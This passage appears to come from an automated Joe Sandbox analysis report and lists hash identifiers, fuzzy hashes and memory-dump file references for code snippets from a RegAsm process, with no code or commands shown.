                                              • Opcode Fuzzy Hash: a1be54059da3941b8afe21f755b162cb9ae7012894f36bf963990f90998b76ce
                                              • Instruction Fuzzy Hash: 62B0123081260987CB6C3F364949414B5A0A50428ABC001AAEC00C4180D23EC1EA9772
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b6399a039058e89d9830e0fa2c1446f3eddb715bf60ed9b15fe2e0348a4c7fc5
                                              • Instruction ID: fae4e47e5c627fe3776c8ca586f9f273fd33b9cb95b1f4a92818fac2acc935bb
                                              • Opcode Fuzzy Hash: b6399a039058e89d9830e0fa2c1446f3eddb715bf60ed9b15fe2e0348a4c7fc5
                                              • Instruction Fuzzy Hash: 4EB01234C5360641CF283131084208030505B45105FD10974E80440295D46F50D54342
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4762b141cccb8be51c3b481b6e599e5b918a4c5fbeab1ebdbf916b890a98a752
                                              • Instruction ID: a899565bdb89690c60b6487471124c2ef10b2cd1d93ccec9dfb34e1003685a12
                                              • Opcode Fuzzy Hash: 4762b141cccb8be51c3b481b6e599e5b918a4c5fbeab1ebdbf916b890a98a752
                                              • Instruction Fuzzy Hash: BDB01230C5360E41CE2832711C8204034505B09104FC10175D40440151D4AF81D54243
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 953b78e08caa02d1b8b2264dfcc10011e0dc384c8b6ec44977d76ffb261f4f74
                                              • Instruction ID: 3e2dba776583a2080d6b09849fc3fba57bc73782179b2059f960f718e1e04261
                                              • Opcode Fuzzy Hash: 953b78e08caa02d1b8b2264dfcc10011e0dc384c8b6ec44977d76ffb261f4f74
                                              • Instruction Fuzzy Hash: D6A00214D9B81E11E81832FA1D9709475505B8D118FC61574EC0C8029AE88E26E947D3
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8373c0bd6b6d1374926a910ae289d3ec1e4f9a0d80babbeb68c09825bb337e11
                                              • Instruction ID: e681d1fdd69f8cb694b7624c59b1e1452aed23190336c47eb0a766def66c10fe
                                              • Opcode Fuzzy Hash: 8373c0bd6b6d1374926a910ae289d3ec1e4f9a0d80babbeb68c09825bb337e11
                                              • Instruction Fuzzy Hash: 29A00244E9790E01D92832FA1D974A4B4505BCD114FC651A1EC0C80196F88E16EA0393
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: faff66acc05fc603867b7aa97631fcc8f636faf36c6db34e23004f411e065ad7
                                              • Instruction ID: 315ac80ecb5c48fd4c7f641ae0e42db1a0b1f2e0ec3106a4274a7114dd990a22
                                              • Opcode Fuzzy Hash: faff66acc05fc603867b7aa97631fcc8f636faf36c6db34e23004f411e065ad7
                                              • Instruction Fuzzy Hash: 5FB01251E0D02D4BFB30A740C42237C11902F08340F1A00B5800E631E2CD182E408640
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c9a052a16d382e9c40a79d06a7946cd2bc5fe5d5261019d8e1aaa6e335f2ea70
                                              • Instruction ID: 628ac45e6ed876cc495f84d99f6c5a0877a710315cec3dfc0a174772667bc775
                                              • Opcode Fuzzy Hash: c9a052a16d382e9c40a79d06a7946cd2bc5fe5d5261019d8e1aaa6e335f2ea70
                                              • Instruction Fuzzy Hash: 5AA00201F1E01EC1F2341291D0213FE0C008B08720F5F0071D42D261E66D0C3F4415C5